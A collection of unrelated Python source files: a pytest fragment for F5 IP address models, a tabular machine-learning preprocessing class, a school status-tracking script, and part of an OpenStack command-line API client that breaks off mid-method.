except ValueError:
assert expected_result is False
else:
with pytest.raises(ValueError):
F5IPv4(test_ip)
@pytest.mark.parametrize("ipv, test_ip, expected_result", test_params)
def test_ipv6(self, ipv, test_ip, expected_result):
if ipv == "ipv6":
try:
model = F5IPv6(test_ip)
assert model.addr in repr(model)
assert model.mask in repr(model)
assert model.rdid in repr(model)
except ValueError:
assert expected_result is False
else:
with pytest.raises(ValueError):
F5IPv6(test_ip)
|
import importlib
from logging import getLogger
from IPython.display import display
from boruta import BorutaPy
from category_encoders import (
CountEncoder,
OneHotEncoder,
OrdinalEncoder,
TargetEncoder
)
import numpy as np
import pandas as pd
import scipy.sparse as sp
from scipy.stats import ks_2samp
from sklearn.ensemble import IsolationForest
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_selection import RFE
from sklearn.metrics import roc_auc_score
from tqdm import tqdm
from xgboost import XGBClassifier
logger = getLogger('predict').getChild('TableDataTranslater')
if 'BaseDataTranslater' not in globals():
from .BaseDataTranslater import BaseDataTranslater
if 'SingleTrainer' not in globals():
from ..trainers.SingleTrainer import SingleTrainer
if 'Trainer' not in globals():
from ..trainers.Trainer import Trainer
class TableDataTranslater(BaseDataTranslater):
def __init__(self, kernel=False):
self.kernel = kernel
self.configs = {}
def _translate_adhoc_df(self):
trans_adhoc_df = self.configs['pre']['table'].get('adhoc_df')
if not trans_adhoc_df:
return
if not self.kernel:
myfunc = importlib.import_module(
'modules.myfuncs.%s' % trans_adhoc_df['myfunc'])
# temp merge
train_pred_df = pd.merge(
self.train_df, self.pred_df, left_index=True, right_index=True)
for method_name in trans_adhoc_df['methods']:
logger.info('adhoc_df: %s' % method_name)
if not self.kernel:
method_name = 'myfunc.%s' % method_name
train_pred_df, self.test_df = eval(
method_name)(train_pred_df, self.test_df)
# temp drop
self.train_df = train_pred_df.drop(self.pred_cols, axis=1)
del train_pred_df
return
def _delete_columns(self):
trans_del = self.configs['pre']['table'].get('deletion')
if not trans_del:
return
logger.info('delete: %s' % trans_del)
self.train_df.drop(trans_del, axis=1, inplace=True)
self.test_df.drop(trans_del, axis=1, inplace=True)
return
def _encode_category_with_cv(self, model_obj, columns):
# train_cvを採用
cv, _ = Trainer.get_cvs_from_json(self.configs['fit'].get('cv'))
logger.info(f'cv: {cv}')
indexes = cv.split(self.train_df, self.pred_df)
# train
train_encoded = []
for train_index, val_index in indexes:
model_obj.fit(
self.train_df.loc[train_index][columns],
self.pred_df.loc[train_index])
_train_encoded = model_obj.transform(
self.train_df.loc[val_index][columns])
train_encoded.append(_train_encoded)
train_encoded = pd.concat(train_encoded)
# onehotとlabelでのnan対策
train_encoded = train_encoded.fillna(-1)
train_encoded.sort_index(inplace=True)
# test
# train全てでfit
# to-do: fitのみpipeline対応検討
model_obj.fit(self.train_df[columns], self.pred_df)
test_encoded = model_obj.transform(self.test_df[columns])
# pre_processers用
self.encoding_model = model_obj
return train_encoded, test_encoded
def _encode_category_single(self, model, columns):
if model == 'count':
model_obj = CountEncoder(cols=columns)
elif model == 'onehot':
model_obj = OneHotEncoder(cols=columns, use_cat_names=True)
elif model == 'label':
model_obj = OrdinalEncoder(cols=columns)
elif model == 'target':
model_obj = TargetEncoder(cols=columns)
else:
logger.error('NOT IMPLEMENTED CATEGORY ENCODING: %s' % model)
raise Exception('NOT IMPLEMENTED')
# data leak対策
train_encoded, test_encoded = \
self._encode_category_with_cv(model_obj, columns)
# rename
rename_mapping = {}
for column in columns:
rename_mapping[column] = f'{column}_{model}'
train_encoded.rename(columns=rename_mapping, inplace=True)
test_encoded.rename(columns=rename_mapping, inplace=True)
return train_encoded, test_encoded
def _encode_category(self):
trans_category = self.configs['pre']['table'].get('category_encoding')
if not trans_category:
return
# option columns
option_columns = []
for option in trans_category['options']:
option_columns.extend(option['columns'])
option_columns = list(set(option_columns))
# default columns
default_columns = []
for column, dtype in self.test_df.dtypes.items():
if column in [self.id_col]:
continue
if dtype != 'object':
continue
if column in option_columns:
continue
default_columns.append(column)
# encode
trans_category['default']['columns'] = default_columns
for config in trans_category['options'] + [trans_category['default']]:
logger.info('encoding model: %s' % config['model'])
logger.info('encode category: %s' % config['columns'])
train_encoded, test_encoded = \
self._encode_category_single(
config['model'], config['columns'])
# merge
self.train_df = pd.merge(
self.train_df, train_encoded,
left_index=True, right_index=True)
self.test_df = pd.merge(
self.test_df, test_encoded,
left_index=True, right_index=True)
# drop
self.train_df.drop(config['columns'], axis=1, inplace=True)
self.test_df.drop(config['columns'], axis=1, inplace=True)
return
def _calc_base_train_data(self):
self.Y_train = self.pred_df.to_numpy()
self.train_ids = self.train_df[self.id_col].to_numpy()
self.X_train = self.train_df.drop(
self.id_col, axis=1).to_numpy()
self.test_ids = self.test_df[self.id_col].to_numpy()
self.X_test = self.test_df.drop(
self.id_col, axis=1).to_numpy()
self.feature_columns = []
for key in self.train_df.keys():
if key == self.id_col:
continue
self.feature_columns.append(key)
return
def _translate_adhoc_ndarray(self):
trans_adhoc_ndarray = \
self.configs['pre']['table'].get('adhoc_ndarray')
if not trans_adhoc_ndarray:
return
if not self.kernel:
myfunc = importlib.import_module(
'modules.myfuncs.%s' % trans_adhoc_ndarray['myfunc'])
for method_name in trans_adhoc_ndarray['methods']:
logger.info('adhoc_ndarray: %s' % method_name)
if not self.kernel:
method_name = 'myfunc.%s' % method_name
self.X_train, self.X_test, self.feature_columns = eval(
method_name)(self.X_train, self.X_test, self.feature_columns)
return
def _to_float32(self):
if self.X_train.dtype != 'object':
self.X_train = self.X_train.astype(np.float32)
self.X_test = self.X_test.astype(np.float32)
if self.configs['pre']['train_mode'] == 'reg':
self.Y_train = self.Y_train.astype(np.float32)
return
def _select_feature(self):
selection = self.configs['pre']['table'].get('feature_selection')
if not selection:
return
n = selection['n']
model = selection['model']
if model == 'boruta':
selector = BorutaPy(
estimator=RandomForestClassifier(
class_weight='balanced', max_depth=5, n_jobs=-1),
n_estimators=n, verbose=2, random_state=42)
elif model == 'rfe':
selector = RFE(
estimator=XGBClassifier(random_state=42, n_jobs=-1),
n_features_to_select=n)
else:
logger.error(
'NOT IMPLEMENTED FEATURE SELECTION: %s' % model)
raise Exception('NOT IMPLEMENTED')
selector.fit(self.X_train, self.ravel_like(self.Y_train))
features = selector.support_
logger.info(
f'select feature {self.X_train.shape[1]}'
f' to {len(features[features])}')
self.X_train = self.X_train[:, features]
self.X_test = self.X_test[:, features]
self.feature_columns = list(np.array(self.feature_columns)[features])
return
def _extract_with_ks_validation(self):
ks = self.configs['pre']['table'].get('ks_validation')
if not ks:
return
logger.info('extract columns with Kolmogorov-Smirnov validation')
_indexes = []
for i, col in tqdm(enumerate(self.feature_columns)):
p_val = ks_2samp(self.X_train[:, i], self.X_test[:, i])[1]
if p_val < 0.05:
logger.info(
'Kolmogorov-Smirnov not same distriburion: %s'
% self.feature_columns[i])
else:
_indexes.append(i)
self.X_train = self.X_train[:, _indexes]
self.X_test = self.X_test[:, _indexes]
self.feature_columns = list(np.array(self.feature_columns)[_indexes])
return
def _extract_with_adversarial_validation(self):
def _get_adversarial_preds(X_train, X_test, adversarial):
if adversarial['model_config'].get('cv_select') != 'train_all':
logger.error(
'ONLY IMPLEMENTED ADVERSARIAL VALIDATION WITH TRAIN ALL')
raise Exception('NOT IMPLEMENTED')
# create data
X_adv = np.vstack((X_train, X_test))
Y_adv = np.concatenate(
(np.zeros(X_train.shape[0]), np.ones(X_test.shape[0])),
axis=0)
# fit
single_trainer_obj = SingleTrainer(
X_train=self.X_train, Y_train=self.Y_train, X_test=self.X_test,
feature_columns=self.feature_columns, configs=self.configs)
_, estimator = single_trainer_obj.calc_single_estimator(
adversarial['model_config'], X_train=X_adv, Y_train=Y_adv)
if not hasattr(estimator, 'predict_proba'):
logger.error(
'NOT PREDICT_PROBA METHOD IN ADVERSARIAL ESTIMATOR')
raise Exception('NOT IMPLEMENTED')
if hasattr(estimator, 'classes_'):
test_index = list(estimator.classes_).index(1)
else:
logger.warning('CLASSES_ NOT IN ESTIMATOR')
test_index = 1
# predict
auc = roc_auc_score(
Y_adv, estimator.predict_proba(X_adv)[:, test_index])
logger.info(f'auc: {auc}')
adv_train_preds = estimator.predict_proba(X_train)[:, test_index]
adv_test_preds = estimator.predict_proba(X_test)[:, test_index]
return adv_train_preds, adv_test_preds
adversarial = \
self.configs['pre']['table'].get('adversarial_validation')
if not adversarial:
return
logger.info('extract train data with adversarial validation')
logger.warning('IN DATA PREPROCESSING, USING TEST DATA')
adv_train_preds, adv_test_preds = _get_adversarial_preds(
self.X_train, self.X_test, adversarial)
logger.info('adversarial train preds:')
display(pd.DataFrame(adv_train_preds).describe(include='all'))
logger.info('adversarial test preds:')
display(pd.DataFrame(adv_test_preds).describe(include='all'))
if adversarial.get('add_column'):
logger.info('add adversarial_test_proba column to X')
self.feature_columns.append('adversarial_test_proba')
self.X_train = np.hstack(
(self.X_train,
np.array(adv_train_preds.reshape(-1, 1))))
self.X_test = np.hstack(
(self.X_test,
np.array(adv_test_preds.reshape(-1, 1))))
threshold = adversarial.get('threshold', 0.5)
org_len = self.X_train.shape[0]
self.X_train = self.X_train[adv_train_preds > threshold]
self.Y_train = self.Y_train[adv_train_preds > threshold]
logger.info('with threshold %s, train data reduced %s => %s'
% (threshold, org_len, self.X_train.shape[0]))
return
def _extract_with_no_anomaly_validation(self):
no_anomaly = self.configs['pre']['table'].get('no_anomaly_validation')
if not no_anomaly:
return
logger.info('extract no anomaly train data')
contamination = no_anomaly.get('contamination')
if not contamination and int(contamination) != 0:
contamination = 'auto'
isf = IsolationForest(
contamination=contamination, random_state=42, n_jobs=-1)
preds = isf.fit_predict(self.X_train, self.Y_train)
train_scores = isf.decision_function(self.X_train)
test_scores = isf.decision_function(self.X_test)
if no_anomaly.get('add_column'):
logger.info('add no_anomaly_score column to X')
self.feature_columns.append('no_anomaly_score')
self.X_train = np.hstack(
(self.X_train,
np.array(train_scores.reshape(-1, 1))))
self.X_test = np.hstack(
(self.X_test,
np.array(test_scores.reshape(-1, 1))))
org_len = self.X_train.shape[0]
self.X_train = self.X_train[preds == 1]
self.Y_train = self.Y_train[preds == 1]
logger.info('train data reduced %s => %s'
% (org_len, self.X_train.shape[0]))
return
def _reshape_x_for_keras(self):
mode = self.configs['pre']['table'].get('reshape_for_keras')
if not mode:
return
logger.info('reshape x for keras: %s' % mode)
if mode == 'lstm':
self.X_train = self.X_train.reshape(*self.X_train.shape, 1)
self.X_test = self.X_test.reshape(*self.X_test.shape, 1)
label_num = len(np.unique(self.Y_train))
self.X_train = np.concatenate([self.X_train] * label_num, axis=2)
self.X_test = np.concatenate([self.X_test] * label_num, axis=2)
else:
logger.error('NOT IMPLEMENTED RESHAPE FOR KERAS: %s' % mode)
raise Exception('NOT IMPLEMENTED')
return
def _to_sparse(self):
sparse = self.configs['pre']['table'].get('sparse')
if not sparse:
return
if self.X_train.dtype == 'object':
return
if 'g_nb' not in [
_c['model'] for _c
in self.configs['fit']['single_model_configs']
]:
logger.info('set x to sparse')
self.X_train = sp.csr_matrix(self.X_train)
self.X_test = sp.csr_matrix(self.X_test)
return
def calc_train_data(self):
# df
self._calc_raw_data()
self._translate_adhoc_df()
self._delete_columns()
self._encode_category()
# ndarray
self._calc_base_train_data()
self._translate_adhoc_ndarray()
self._to_float32()
self._translate_y_pre()
# validation
self._select_feature()
self._extract_with_ks_validation()
self._extract_with_adversarial_validation()
self._extract_with_no_anomaly_validation()
# format
self._reshape_x_for_keras()
self._to_sparse()
return
|
<reponame>chidinzerem/chidinzerem.github.io<filename>code/WEBSCRAPER PYTHON/status.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ------------------------
# Penji OpDev Fall 2019
# Check Status of School
# Author: <NAME>
# Updated: 02.08.2019
# ------------------------
# General
import os
import shutil
import pickle
import argparse
from collections import OrderedDict
from pprint import pprint as pprint
# Local
from core.config import cfg
from core.utils import setup_logger, load_user_profile
from core import logger
s_temp = OrderedDict()
s_temp['ready'] = 'No'
s_temp['course_scraper'] = 'Not Started'
s_temp['email_scraper'] = 'Not Started'
s_temp['Professor Archive'] = 'Not Started'
s_temp['Course Archive'] = 'Not Started'
s_temp['Archive Updated'] = '<term>'
s_temp['GS Prepped'] = 'No'
s_temp['GS Uploaded'] = 'No'
s_temp['Notes'] = ''
update_columns = (
'Signoff (Name, Date)',
'Pre-Approval Status',
'LHP Response (yes/no)',
'Planned Date',
'Notes')
def update_status(args, status_dict):
print('For each displayed argument enter a value or leave it blank\n'
'------------------------------------------------------------')
for key, value in status_dict.items():
print(f'CURRENT: {key} = {value}')
new_val = input(f'INPUT -> {key} = ')
print('------------------------------')
if new_val != '':
status_dict[key] = new_val
info_str ='Will Update Information To:\n' \
'------------------------------'
for key, value in status_dict.items():
info_str += f'\n {key} : {value}'
logger.info(info_str)
to_save = input(f'Press enter to continue')
file_name = f'data/{args.school}/status.p'
pickle.dump(status_dict, open(file_name, 'wb'))
def check_status(args):
# Open pickle file or create one
file_name = f'data/{args.school}/status.p'
if os.path.exists(file_name):
status_dict = pickle.load(open(file_name, 'rb'))
else:
status_dict = s_temp
pickle.dump(status_dict, open(file_name, 'wb'))
info_str = f'Current Status for {cfg[args.school.upper()].NICE_NAME}'
for key, value in status_dict.items():
info_str += f'\n {key} : {value}'
logger.info(info_str)
return status_dict
def reset_status(args):
if os.path.exists(f'data/{args.school}/status.p'):
os.remove(f'data/{args.school}/status.p')
def reset_logs(args):
if os.path.exists(f'data/{args.school}/logs'):
shutil.rmtree(f'data/{args.school}/logs')
if __name__ == '__main__':
# Parser for command input
parser = argparse.ArgumentParser('Check or Update Status of School ')
# General PenjiDev Args
parser.add_argument('-school', help='Enter a school name', required=True)
parser.add_argument('-term', help='Enter a term', default='fall19')
parser.add_argument('-test', action='store_true', help='Test Runs')
parser.add_argument('-log', help='Enter logger level: debug, info, warn, error, none', default='info', type=str)
# Special Args
parser.add_argument('-update', action='store_true', help='Update Status')
parser.add_argument('-reset_status', action='store_true', help='Reset Status')
parser.add_argument('-reset_logs', action='store_true', help='Reset Log Files')
parser_args = parser.parse_args()
setup_logger(parser_args, 'status')
# Always Check Status First
if parser_args.reset_status:
reset_status(parser_args)
status_dict = check_status(parser_args)
if parser_args.update:
update_status(parser_args, status_dict)
if parser_args.reset_logs:
reset_logs(parser_args)
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import json
import os
import re
import sys
import time
from enum import Enum
from inspect import FrameInfo
from json import JSONDecodeError
from typing import Callable, Dict, Iterable, List, Optional, TypeVar, Union
from openstack_cli.modules.apputils.curl import CURLResponse, CurlRequestType, curl
from openstack_cli.modules.apputils.progressbar import CharacterStyles, ProgressBar, ProgressBarFormat, \
ProgressBarOptions
from openstack_cli.modules.apputils.terminal.colors import Colors
from openstack_cli.modules.openstack.api_objects import APIProjects, ComputeFlavorItem, ComputeFlavors, ComputeLimits, \
ComputeServerActionRebootType, ComputeServerActions, ComputeServerInfo, ComputeServers, DiskImageInfo, DiskImages, \
LoginResponse, NetworkItem, NetworkLimits, Networks, Region, RegionItem, Subnets, Token, VMCreateResponse, \
VMKeypairItem, \
VMKeypairItemValue, VMKeypairs, VolumeV3Limits
from openstack_cli.modules.openstack.objects import AuthRequestBuilder, AuthRequestType, EndpointTypes, ImageStatus, \
OSFlavor, OSImageInfo, OSNetwork, OpenStackEndpoints, OpenStackQuotaType, OpenStackQuotas, OpenStackUsers, \
OpenStackVM, OpenStackVMInfo, ServerPowerState, ServerState, VMCreateBuilder
T = TypeVar('T')
class JSONValueError(ValueError):
KEY: str = "{@json@}:"
def __init__(self, data: str):
self.__data = None
try:
json.loads(data)
self.__data = data
except (TypeError, JSONDecodeError):
super(JSONValueError, self).__init__(data)
def __str__(self):
return f"{self.KEY}{self.__data}" if self.__data else super(JSONValueError, self).__str__()
class LocalCacheType(Enum):
SERVERS = 0
KEYPAIR = 1
class OpenStack(object):
def __init__(self, conf, debug: bool = False):
"""
:type conf openstack_cli.core.config.Configuration
"""
self.__last_errors: List[str] = []
self.__login_api = f"{conf.os_address}/v3"
self._conf = conf
self.__endpoints__: Optional[OpenStackEndpoints] = None
self.__cache_images: Dict[str, DiskImageInfo] = {}
# initializes in 2 steps: scanning images and server list when it is requested
self.__users_cache: Optional[OpenStackUsers] = None
self.__flavors_cache: Optional[Dict[str, OSFlavor]] = {}
self.__networks_cache: Optional[OSNetwork] = None
self.__debug = debug or os.getenv("API_DEBUG", False) == "True"
self.__local_cache: Dict[LocalCacheType, object] = {}
pattern_str = f"[\\W\\s]*(?P<name>{'|'.join(conf.supported_os_names)})(\\s|\\-|\\_)(?P<ver>[\\d\\.]+\\s*[\\w]*).*$"
self.__os_image_pattern = re.compile(pattern_str, re.IGNORECASE)
self.__is_auth: bool = False
def __invalidate_local_cache(self, cache_type: LocalCacheType):
self.__local_cache[cache_type.value] = None
def __set_local_cache(self, cache_type: LocalCacheType, value: T) -> T:
self.__local_cache[cache_type.value] = value
return value
def __get_local_cache(self, cache_type: LocalCacheType) -> T:
if cache_type.value not in self.__local_cache:
return None
return self.__local_cache[cache_type.value]
def __init_after_auth__(self):
def __cache_ssh_keys():
conf_keys_hashes = [hash(k) for k in self._conf.get_keys()]
server_keys = self.get_keypairs()
for server_key in server_keys:
if hash(server_key) not in conf_keys_hashes:
try:
self._conf.add_key(server_key)
except ValueError:
print(f"Key {server_key.name} is present locally but have wrong hash, replacing with server key")
self._conf.delete_key(server_key.name)
self._conf.add_key(server_key)
self._conf.cache.set(VMKeypairItemValue, "this super cache")
def __cached_network():
self.__networks_cache = OSNetwork(serialized_obj=self._conf.cache.get(OSNetwork))
def __cached_images():
self.__cache_images = {k: DiskImageInfo(serialized_obj=v) for k, v in json.loads(self._conf.cache.get(DiskImageInfo)).items()}
def __cached_flavors():
self.__flavors_cache = {k: OSFlavor(serialized_obj=v) for k, v in json.loads(self._conf.cache.get(OSFlavor)).items()}
def __cached_ssh_keys():
return True
_cached_objects = {
DiskImageInfo: {
False: lambda: self.images,
True: lambda: __cached_images()
},
OSFlavor: {
False: lambda: self.flavors,
True: lambda: __cached_flavors()
},
OSNetwork: {
False: lambda: self.networks,
True: lambda: __cached_network()
},
VMKeypairItemValue: {
False: lambda: __cache_ssh_keys(),
True: lambda: __cached_ssh_keys()
}
}
need_recache: bool = False in [self._conf.cache.exists(obj) for obj in _cached_objects]
if need_recache and not self.__debug:
p = ProgressBar("Syncing to the server data",20,
ProgressBarOptions(CharacterStyles.simple, ProgressBarFormat.PROGRESS_FORMAT_STATUS)
)
p.start(len(_cached_objects))
for cache_item, funcs in _cached_objects.items():
p.progress_inc(1, cache_item.__name__)
funcs[self._conf.cache.exists(cache_item)]()
p.stop(hide_progress=True)
else:
for cache_item, funcs in _cached_objects.items():
funcs[self._conf.cache.exists(cache_item)]()
if not self.__users_cache:
self.users
def __check_token(self) -> bool:
headers = {
"X-Auth-Token": self._conf.auth_token,
"X-Subject-Token": self._conf.auth_token
}
r = self._request_simple(
EndpointTypes.identity,
"/auth/tokens",
req_type=CurlRequestType.GET,
headers=headers
)
if not r:
from openstack_cli.core.output import Console
Console.print_error("Authentication server is not accessible")
return False
if r.code not in [200, 201]:
return False
l_resp = LoginResponse(serialized_obj=r.content)
self.__endpoints__ = OpenStackEndpoints(self._conf, l_resp)
self._conf.user_id = l_resp.token.user.id
return True
def __auth(self, _type: AuthRequestType = AuthRequestType.SCOPED) -> bool:
if self._conf.auth_token and self.__check_token():
return True
if _type == AuthRequestType.UNSCOPED:
data = AuthRequestBuilder.unscoped_login(self._conf.os_login, self._conf.os_password)
elif _type == AuthRequestType.SCOPED and self._conf.project.id:
data = AuthRequestBuilder.scoped_login(self._conf.os_login, self._conf.os_password, self._conf.project)
else:
data = AuthRequestBuilder.normal_login(self._conf.os_login, self._conf.os_password)
r = self._request_simple(
EndpointTypes.identity,
"/auth/tokens",
req_type=CurlRequestType.POST,
data=data
)
if not r:
from openstack_cli.core.output import Console
data = r.raw if r else "none"
Console.print_error(f"Authentication server is not accessible: {data}")
return False
if r.code not in [200, 201]:
return False
auth_token = r.headers["X-Subject-Token"] if "X-Subject-Token" in r.headers else None
self._conf.auth_token = auth_token
l_resp = LoginResponse(serialized_obj=r.from_json())
if _type == AuthRequestType.UNSCOPED:
l_resp.token = Token(catalog=[])
self.__endpoints__ = None
else:
self._conf.user_id = l_resp.token.user.id
self.__endpoints__ = OpenStackEndpoints(self._conf, l_resp)
return True
def last_errors(self) -> List[str]:
"""
Returning list of last errors with cleaning the results
"""
return self.__last_errors
def clear_errors(self):
self.__last_errors = []
@property
def has_errors(self) -> bool:
return len(self.__last_errors) > 0
@property
def __endpoints(self) -> OpenStackEndpoints:
return self.__endpoints__
@property
def endpoints(self):
return self.__endpoints
def logout(self):
self._conf.auth_token = ""
def login(self, _type: AuthRequestType = AuthRequestType.SCOPED) -> bool:
if self.__auth(_type):
self.__is_auth = True
if _type != AuthRequestType.UNSCOPED and self._conf.region:
self.__init_after_auth__()
return True
else:
self.__last_errors.append("Login failed, some exception happen")
return False
def __get_origin_frame(self, base_f_name: str) -> List[FrameInfo]:
import inspect
_frames = inspect.stack()
for i in range(0, len(_frames)):
if _frames[i].function == base_f_name:
return [_frames[i+3], _frames[i+2], _frames[i+1]]
def _request_simple(self,
endpoint: EndpointTypes,
relative_uri: str,
params: Dict[str, str] = None,
headers: Dict[str, str] = None,
req_type: CurlRequestType = CurlRequestType.GET,
data: str or dict = None
) -> CURLResponse or None:
if endpoint == EndpointTypes.identity:
_endpoint: str = f"{self.__login_api}"
else:
_endpoint: str = self.__endpoints.get_endpoint(endpoint)
url = f"{_endpoint}{relative_uri}"
_t_start = 0
if self.__debug:
_t_start = time.time_ns()
r = None
try:
return curl(url, req_type=req_type, params=params, headers=headers, data=data)
except TimeoutError:
self.__last_errors.append("Timeout exception on API request")
return None
finally:
if self.__debug:
from openstack_cli.core.output import Console
_t_delta = time.time_ns() - _t_start
_t_sec = _t_delta / 1000000000
_params = ",".join([f"{k}={v}" for k, v in params.items()]) if params else "None"
_f_caller = self.__get_origin_frame(self._request_simple.__name__)
_chunks = [
f"[{_t_sec:.2f}s]",
f"[{req_type.value}]",
f"[{endpoint.value}]",
f" {relative_uri}; ",
str(Colors.RESET),
f"{Colors.BRIGHT_BLACK}{os.path.basename(_f_caller[0].filename)}{Colors.RESET}: ",
f"{Colors.BRIGHT_BLACK}->{Colors.RESET}".join([f"{f.function}:{f.lineno}" for f in _f_caller])
]
Console.print_debug("".join(_chunks))
def _request(self,
endpoint: EndpointTypes,
relative_uri: str,
params: Dict[str, str] = None,
req_type: CurlRequestType = CurlRequestType.GET,
is_json: bool = False,
page_collection_name: str = None,
data: str or dict = None
) -> str or dict or None:
if not self.__is_auth and not self.login():
raise RuntimeError("Not Authorised")
_endpoint = self.__login_api if endpoint == EndpointTypes.identity else self.__endpoints.get_endpoint(endpoint)
_t_start = 0
if self.__debug:
_t_start = time.time_ns()
url = f"{_endpoint}{relative_uri}"
headers = {
"X-Auth-Token": self._conf.auth_token
}
r = None
try:
r = curl(url, req_type=req_type, params=params, headers=headers, data=data)
except TimeoutError:
self.__last_errors.append("Timeout exception on API request")
return
finally:
if self.__debug:
from openstack_cli.core.output import Console
_t_delta = time.time_ns() - _t_start
_t_sec = _t_delta / 1000000000
_params = ",".join([f"{k}={v}" for k, v in params.items()]) if params else "None"
_f_caller = self.__get_origin_frame(self._request.__name__)
_chunks = [
f"[{_t_sec:.2f}s]",
f"[{req_type.value}]",
f"[{endpoint.value}]",
f" {relative_uri}; ",
str(Colors.RESET),
f"{Colors.BRIGHT_BLACK}{os.path.basename(_f_caller[0].filename)}{Colors.RESET}: ",
f"{Colors.BRIGHT_BLACK}->{Colors.RESET}".join([f"{f.function}:{f.lineno}" for f in _f_caller])
]
Console.print_debug("".join(_chunks))
if r.code not in [200, 201, 202, 204]:
# if not data:
# return None
raise JSONValueError(r.content)
if r.code in [204]:
return ""
content = r.from_json() if is_json else r.content
if is_json and page_collection_name and isinstance(content, dict):
if "next" in content and content["next"]:
uri, _, args = content["next"].partition("?")
elif "links" in content and "next" in content["links"] and content["links"]["next"]:
uri, _, args = content["links"]["next"].partition("?")
else:
return content
params = dict([i.split("=") for i in args.split("&")])
next_page = self._request(
endpoint,
uri,
params=params,
req_type=req_type,
is_json=is_json,
page_collection_name=page_collection_name
)
content[page_collection_name].extend(next_page[page_collection_name])
return content
@property
def regions(self) -> List[RegionItem]:
r = self._request(EndpointTypes.identity, "/regions", is_json=True, page_collection_name="regions")
return Region(serialized_obj=r).regions
@property
def projects(self):
d = self._request(
EndpointTypes.identity,
"/auth/projects",
is_json=True,
req_type=CurlRequestType.GET,
)
return APIProjects(serialized_obj=d).projects
@property
def users(self) -> OpenStackUsers:
if self.__users_cache:
return self.__users_cache
self.__users_cache = OpenStackUsers(self.images)
self.__users_cache.add_user(self._conf.user_id, self._conf.os_login)
return self.__users_cache
@property
def images(self) -> List[DiskImageInfo]:
if self.__cache_images:
return list(self.__cache_images.values())
params = {
"limit": "1000"
}
images = DiskImages(
serialized_obj=self._request(
EndpointTypes.image,
"/images",
is_json=True,
page_collection_name="images",
params=params
)
).images
_cached_images = {}
_cached = {}
for img in images:
_cached_images[img.id] = img
_cached[img.id] = img.serialize()
self._conf.cache.set(DiskImageInfo, _cached)
self.__cache_images = _cached_images
return list(self.__cache_images.values())
def get_os_image(self, image: DiskImageInfo) -> Optional[OSImageInfo]:
if image.image_type: # process only base images
return None
match = re.match(self.__os_image_pattern, image.name)
if not match:
return None
os_img = OSImageInfo(
match.group("name"),
match.group("ver"),
image
)
# === here is some lame way to filter out image forks or non-base images by analyzing image name
# ToDo: Is here a better way to distinguish the image os?
# try to handle situations like "x yyyy" in versions and treat them like "x.yyyy"
ver = os_img.version.split(" ") if " " in os_img.version else None
if ver:
try:
ver = ".".join([str(int(n)) for n in ver])
except ValueError:
ver = None
if ver:
os_img.version = ver
if "SP" not in os_img.version and " " in os_img.version:
return None
return os_img
@property
def os_images(self) -> List[OSImageInfo]:
img = []
known_versions = {}
for image in self.images:
os_img: OSImageInfo = self.get_os_image(image)
if os_img is None:
continue
if os_img.os_name.lower() not in known_versions:
known_versions[os_img.os_name.lower()] = []
if os_img.version in known_versions[os_img.os_name.lower()]:
continue
known_versions[os_img.os_name.lower()].append(os_img.version)
# == /end
img.append(os_img)
img = sorted(img, key=lambda x: x.name)
return img
def get_image(self, image_id: str) -> DiskImageInfo or None:
if not self.__cache_images:
a = self.images
if image_id in self.__cache_images:
return self.__cache_images[image_id]
return None
@property
def quotas(self) -> OpenStackQuotas:
limits_obj = ComputeLimits(self._request(EndpointTypes.compute, "/limits")).limits.absolute
network_obj = NetworkLimits(serialized_obj=self._request(
EndpointTypes.network,
f"/quotas/{self.__endpoints.project_id}/details.json",
is_json=True
)).quota
# volume = VolumeV3Limits(
# serialized_obj=self.__request(
# EndpointTypes.volumev3,
# f"/os-quota-sets/{self.__endpoints.project_id}", params={"usage": "True"}, is_json=True
# )
# )
quotas = OpenStackQuotas()
quotas.add(OpenStackQuotaType.CPU_CORES, limits_obj.maxTotalCores, limits_obj.totalCoresUsed)
quotas.add(OpenStackQuotaType.RAM_GB, limits_obj.maxTotalRAMSize / 1024, limits_obj.totalRAMUsed / 1024)
quotas.add(OpenStackQuotaType.INSTANCES, limits_obj.maxTotalInstances, limits_obj.totalInstancesUsed)
quotas.add(OpenStackQuotaType.NET_PORTS, network_obj.port.limit, network_obj.port.used)
quotas.add(OpenStackQuotaType.KEYPAIRS, limits_obj.maxTotalKeypairs, 0)
quotas.add(OpenStackQuotaType.SERVER_GROUPS, limits_obj.maxServerGroups, limits_obj.totalServerGroupsUsed)
quotas.add(OpenStackQuotaType.RAM_MB, limits_obj.maxTotalRAMSize, limits_obj.totalRAMUsed)
return quotas
@property
def flavors(self) -> List[OSFlavor]:
if self.__flavors_cache:
return list(self.__flavors_cache.values())
params = {
"limit": "1000"
}
flavors_raw = self._request(
EndpointTypes.compute,
"/flavors/detail",
is_json=True,
params=params,
page_collection_name="flavors"
)
__flavors_cache = {}
_cache = {}
for flavor in ComputeFlavors(serialized_obj=flavors_raw).flavors:
_flavor = OSFlavor.get(flavor)
self.__flavors_cache[_flavor.id] = _flavor
_cache[_flavor.id] = _flavor.serialize()
self._conf.cache.set(OSFlavor, _cache)
return list(self.__flavors_cache.values())
def get_flavors(self, image: OSImageInfo = None) -> Iterable[OSFlavor]:
"""
Returns acceptable flavors for image
"""
for fl in sorted(self.flavors, key=lambda x: x.disk):
if image and fl.disk > image.size and fl.ephemeral_disk > 0:
yield fl
def get_flavor(self, image: OSImageInfo = None, name: str = "") -> OSFlavor or None:
if not name:
flavors = list(self.get_flavors(image))
if flavors:
return flavors[0]
else:
for fl in self.flavors:
if fl.name == name:
return fl
return None
def get_image_by_alias(self, alias: str) -> Iterable[OSImageInfo]:
"""
Return image object by given alias name
"""
for img in self.os_images:
if img.alias == alias:
yield img
def get_servers(self, arguments: dict = None, invalidate_cache: bool = False) -> OpenStackVM or None:
if arguments is None:
arguments = {}
if invalidate_cache:
self.__invalidate_local_cache(LocalCacheType.SERVERS)
__cached_value = self.__get_local_cache(LocalCacheType.SERVERS)
if __cached_value is not None and not arguments:
return __cached_value
params = {
"limit": "1000"
